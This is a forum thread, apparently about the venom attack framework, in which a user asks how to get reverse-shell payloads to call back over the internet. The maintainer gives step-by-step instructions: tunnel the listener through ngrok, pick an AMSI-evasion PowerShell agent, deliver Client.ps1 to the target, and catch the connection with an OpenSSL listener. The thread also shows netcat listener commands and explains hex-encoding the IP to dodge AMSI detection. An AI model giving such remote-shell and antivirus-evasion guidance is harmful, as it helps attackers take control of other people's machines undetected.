problem in getting a connection on public network / WAN

[ricko2991]

Hi, i want to access a connection from a different network by sending a payload containing my ip address. And send using the http port forwarding service, namely LocalXpose, but I don't seem to get a return connection from the target.
Localhost

port forwading service

Listener

I tried the method above and it might not work. So I have to use tcp. So the payload use localxpose port and i as listener use my local port. Okay, This is my problem, when I use the tcp port provided by localxpose. it will also be used as a listener. so how can I switch that listener back to my localhost. The listener should use my local port but i can't change it.

[r00t-3xp10it]

see this: https://www.youtube.com/watch?v=fPF-slJLOlk&t=77s

[ricko2991]

Hi, @r00t-3xp10it I have no problem in 1-7 payload categorie payloads when port forwading.
But I have a problem with Amsi evasion, I can't do port forwarding with it

[ricko2991]

have you tried it and succeeded? Somehow i failed...
can you show host and the port you are using on the payload and also the listeners you used.

Hi, i try this:
2.tcp.ngrok.io:14598 --> localhost:1111

Payload options(ngrok)
LPORT : 14598
LHOST : 13.59.15.185 or LHOST : 2.tcp.ngrok.io

Listen
1º nc -lvp 0.0.0.0 14598 ==> invalid local port 0.0.0.0
2º nc -nlvp 1111 ==> Not connected / nc -lvp 1111 ==> not connected
3º nc -nlvp 14598 ==> not connected
4º nc -s 127.0.0.1 -nlvp 14598 ==> not connected
5º nc -s 127.0.0.1 -nlvp 1111 ==> not connected

[r00t-3xp10it]

ok lets try this step by step ...
Check this video for referencie: https://www.youtube.com/watch?v=8YswLITdE7g

1º - ./ngrok tcp 14598
2º - chose venom - amsi evasion agent nº 2
3º - LHOST == 2.tcp.ngrok.io (ngrok)
4º - LPORT == 14598 (ngrok)
5º - goto /var/www/html and port the Agent (Client.ps1) to target machine (manually)
6º - start venom listenner (OpenSSL)
7º - On target machine execute the Client.ps1

Final notes:

Amsi evasion agents require the Apache2 webserver to deliver files to target host ...
so venom users need to port forward the Client.ps1 connection AND the apache2 webserver ..
"But In this exercise we are NOT going to port forward the apache2, just to test if the client connects back to the listenner"..
OpenSSL agents require openssl s_server -quiet -key key.pem -cert cert.pem -port 14598 <-openssl listenner not Netcat

[ricko2991]

Thank you, now it's working.
And also for example I am using agent no.3 on amsi and it is covered by "hex obfuscation" how do I decode a script covered by hex?

[r00t-3xp10it]

the only thing encoded (hex) in agent nº 3 its the ip address ...
This is one attempt to hidde the ip address 'string' from amsi string detection inside Client.ps1 ...



how to decode hex

[ricko2991]

Thank you 👍